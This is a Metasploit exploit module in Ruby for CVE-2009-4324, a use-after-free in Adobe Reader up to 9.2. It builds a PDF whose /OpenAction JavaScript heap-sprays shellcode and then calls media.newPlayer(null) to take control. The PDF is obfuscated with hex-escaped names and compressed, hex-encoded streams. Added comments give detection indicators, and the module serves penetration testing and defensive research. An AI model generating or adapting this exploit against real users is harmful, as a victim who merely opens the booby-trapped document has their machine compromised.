| 1 | ##
| 2 | # This file is part of the Metasploit Framework and may be subject to
| 3 | # redistribution and commercial restrictions. Please see the Metasploit
| 4 | # Framework web site for more information on licensing and terms of use.
| 5 | # http://metasploit.com/framework/
| 6 | ##
| 7 | |
| 8 | require 'msf/core'
| 9 | require 'zlib'
| 10 | |
# File-format module: writes a single PDF (default name 'msf.pdf') whose
# /OpenAction runs an embedded JavaScript stream. The script is the
# document-level JavaScript shown in #exploit; the PDF container itself is
# assembled by #make_pdf and its small helpers below.
#
# Defender notes (all grounded in the strings this module emits):
#   * the document chains /Filter[/FlateDecode/ASCIIHexDecode] on the JS
#     stream and hex-escapes letters in PDF names (#nObfu), so static
#     inspection has to decode both the stream filters and "#xx" name
#     escapes before matching on /JavaScript, /OpenAction or the trigger
#     call `media.newPlayer`.
#   * the module info carries the reference identifiers for this issue
#     (CVE and OSVDB entries in 'References').
class Metasploit3 < Msf::Exploit::Remote
	Rank = GoodRanking

	# presumably supplies file_create and the FILENAME convention used below — verify in the mixin
	include Msf::Exploit::FILEFORMAT

	# Module metadata and options. Everything here is declarative; the only
	# option registered is FILENAME (the output file written by #exploit).
	def initialize(info = {})
		super(update_info(info,
			# NOTE(review): "Multimeda" looks like a typo for "Multimedia"; left as-is here
			# because the name is a runtime string, not a comment.
			'Name'           => 'Adobe Multimeda Doc.media.newPlayer Use After Free Vulnerability',
			'Description'    => %q{
					This module exploits a use after free vulnerability in Adobe Reader and Adobe Acrobat
				Professional versions up to and including 9.2.
			},
			'License'        => MSF_LICENSE,
			'Author'         =>
				[
					'unknown', # Found in the wild
					# Metasploit version by:
					'hdm',
					'pusscat',
					'jduck'
				],
			'Version'        => '$Revision: 7882 $',
			'References'     =>
				[
					[ 'CVE', '2009-4324' ],
					[ 'OSVDB', '60980' ]
				],
			'DefaultOptions' =>
				{
					'EXITFUNC' => 'process',
				},
			'Payload'        =>
				{
					# Payload is JS-unescape()d into a string, so a NUL would truncate it.
					'Space'    => 1024,
					'BadChars' => "\x00",
					'DisableNops' => true
				},
			'Platform' => 'win',
			'Targets'        =>
				[
					# test results (on Windows XP SP3)
					# reader 7.0.5 - untested
					# reader 7.0.8 - untested
					# reader 7.0.9 - untested
					# reader 7.1.0 - untested
					# reader 7.1.1 - untested
					# reader 8.0.0 - untested
					# reader 8.1.2 - untested
					# reader 8.1.3 - untested
					# reader 8.1.4 - untested
					# reader 8.1.5 - untested
					# reader 8.1.6 - untested
					# reader 9.0.0 - untested
					# reader 9.1.0 - untested
					# reader 9.2 - works (no debugger, no DEP)
					[ 'Adobe Reader Windows Universal (JS Heap Spray)',
						{
							# Length (in JS string characters) of each sprayed block; read
							# as target['Size'] inside the script built by #exploit.
							'Size' => (0x10000/2)
						}
					],
				],
			'DisclosureDate' => 'Dec 14 2009',
			'DefaultTarget'  => 0))

		register_options(
			[
				OptString.new('FILENAME', [ true, 'The file name.',  'msf.pdf']),
			], self.class)

	end

	# Builds the document-level JavaScript, wraps it in a PDF via #make_pdf
	# and writes the result with file_create. Has no return value of interest;
	# its effect is the file on disk plus a status line.
	def exploit

		# Encode the shellcode.
		shellcode = Rex::Text.to_unescape(payload.encoded, Rex::Arch.endian(target.arch))

		# Make some nops
		nops = Rex::Text.to_unescape(make_nops(4))

		# Randomize variables
		# Alphabetic-only names, so they are always valid JS identifiers; the
		# random length (1..100) means the script text differs per generated file.
		rand1 = rand_text_alpha(rand(100) + 1)
		rand2 = rand_text_alpha(rand(100) + 1)

		# %Q|...| is the script verbatim; the `|` delimiter never occurs in the JS body.
		# Detection note: the three util.printd calls around media.newPlayer(null)
		# are the literal trigger sequence and are a usable static indicator
		# once the stream is inflated and hex-decoded.
		script = %Q|
var #{rand1} = unescape("#{shellcode}");
var #{rand2} = unescape("#{nops}");

while(#{rand2}.length <= #{target['Size']}) #{rand2}+=#{rand2};
#{rand2}=#{rand2}.substring(0,#{target['Size']} - #{rand1}.length);

memory=new Array();

for(i=0;i<0x2000;i++) {
	memory[i]= #{rand2} + #{rand1};
}

util.printd("1.345678901.345678901.3456 : 1.31.34", new Date());
util.printd("1.345678901.345678901.3456 : 1.31.34", new Date());
try {this.media.newPlayer(null);} catch(e) {}
util.printd("1.345678901.345678901.3456 : 1.31.34", new Date());
|

		# Create the pdf
		pdf = make_pdf(script)

		print_status("Creating '#{datastore['FILENAME']}' file...")

		file_create(pdf)

	end


	# Returns a String of `count` random bytes, each in 0x80..0xff.
	# Used by #make_pdf for the binary comment line that follows the
	# %PDF header.
	def RandomNonASCIIString(count)
		result = ""
		count.times do
			result << (rand(128) + 128).chr
		end
		result
	end

	# "<id> 0 obj" — the header line of an indirect PDF object.
	def ioDef(id)
		"%d 0 obj" % id
	end

	# "<id> 0 R" — an indirect reference to object `id`.
	def ioRef(id)
		"%d 0 R" % id
	end


	#http://blog.didierstevens.com/2008/04/29/pdf-let-me-count-the-ways/
	# Randomly rewrites ASCII letters in `str` as PDF name hex escapes
	# ("#41" for "A"); each letter is escaped with probability 1/2.
	# Only characters whose upcase falls in 'A'..'Z' are touched, so
	# digits, '/', '<', '>' and whitespace pass through unchanged.
	# Output is not deterministic — two calls on the same input differ.
	# NOTE(review): `and` in the condition works here (no assignment on the
	# line) but `&&` is the conventional operator for boolean logic.
	def nObfu(str)
		result = ""
		str.scan(/./u) do |c|
			if rand(2) == 0 and c.upcase >= 'A' and c.upcase <= 'Z'
				result << "#%x" % c.unpack("C*")[0]
			else
				result << c
			end
		end
		result
	end


	# ASCIIHexDecode-compatible encoding of `str`: each byte as two lowercase
	# hex digits, with 1..3 random spaces between bytes (not before the
	# first), terminated by ">" — the filter's end-of-data marker.
	# Returns the encoded String (the value of the final `<<`).
	def ASCIIHexWhitespaceEncode(str)
		result = ""
		whitespace = ""
		str.each_byte do |b|
			result << whitespace << "%02x" % b
			whitespace = " " * (rand(3) + 1)
		end
		result << ">"
	end


	# Assembles a minimal six-object PDF around the JavaScript `js` and
	# returns it as a String:
	#   1 Catalog (/OpenAction -> 5)   2 Outlines   3 Pages   4 Page
	#   5 JavaScript action (/JS -> 6) 6 the script stream
	# Object 6 is ASCIIHex-encoded, then deflated, and declared with
	# /Filter[/FlateDecode/ASCIIHexDecode] so a reader inflates first and
	# hex-decodes second. Byte offsets of each object are recorded in `xref`
	# before the object is appended, so statement order here is load-bearing:
	# any text inserted between an `xref << pdf.length` and its object would
	# corrupt the cross-reference table.
	def make_pdf(js)

		xref = []
		eol = "\x0d\x0a"
		endobj = "endobj" << eol

		# Randomize PDF version?
		pdf = "%PDF-1.5" << eol
		# Binary comment line after the header (high-bit bytes) — the offsets
		# below are measured after it.
		pdf << "%" << RandomNonASCIIString(4) << eol
		xref << pdf.length
		pdf << ioDef(1) << nObfu("<</Type/Catalog/Outlines ") << ioRef(2) << nObfu("/Pages ") << ioRef(3) << nObfu("/OpenAction ") << ioRef(5) << ">>" << endobj
		xref << pdf.length
		pdf << ioDef(2) << nObfu("<</Type/Outlines/Count 0>>") << endobj
		xref << pdf.length
		pdf << ioDef(3) << nObfu("<</Type/Pages/Kids[") << ioRef(4) << nObfu("]/Count 1>>") << endobj
		xref << pdf.length
		pdf << ioDef(4) << nObfu("<</Type/Page/Parent ") << ioRef(3) << nObfu("/MediaBox[0 0 612 792]>>") << endobj
		xref << pdf.length
		# `+` binds tighter than `<<`, so the dictionary is concatenated first, then appended.
		pdf << ioDef(5) << nObfu("<</Type/Action/S/JavaScript/JS ") + ioRef(6) + ">>" << endobj
		xref << pdf.length
		compressed = Zlib::Deflate.deflate(ASCIIHexWhitespaceEncode(js))
		# /Length is the compressed (on-disk) byte count, as required for the stream.
		pdf << ioDef(6) << nObfu("<</Length %s/Filter[/FlateDecode/ASCIIHexDecode]>>" % compressed.length) << eol
		pdf << "stream" << eol
		pdf << compressed << eol
		pdf << "endstream" << eol
		pdf << endobj
		# Offset of the "xref" keyword, echoed after "startxref" below.
		xrefPosition = pdf.length
		pdf << "xref" << eol
		# Entry count is the six objects plus the mandatory free entry 0.
		pdf << "0 %d" % (xref.length + 1) << eol
		pdf << "0000000000 65535 f" << eol
		xref.each do |index|
			pdf << "%010d 00000 n" % index << eol
		end
		pdf << "trailer" << nObfu("<</Size %d/Root " % (xref.length + 1)) << ioRef(1) << ">>" << eol
		pdf << "startxref" << eol
		pdf << xrefPosition.to_s() << eol
		# The final `<<` returns `pdf`, which is the method's return value.
		pdf << "%%EOF" << eol

	end

end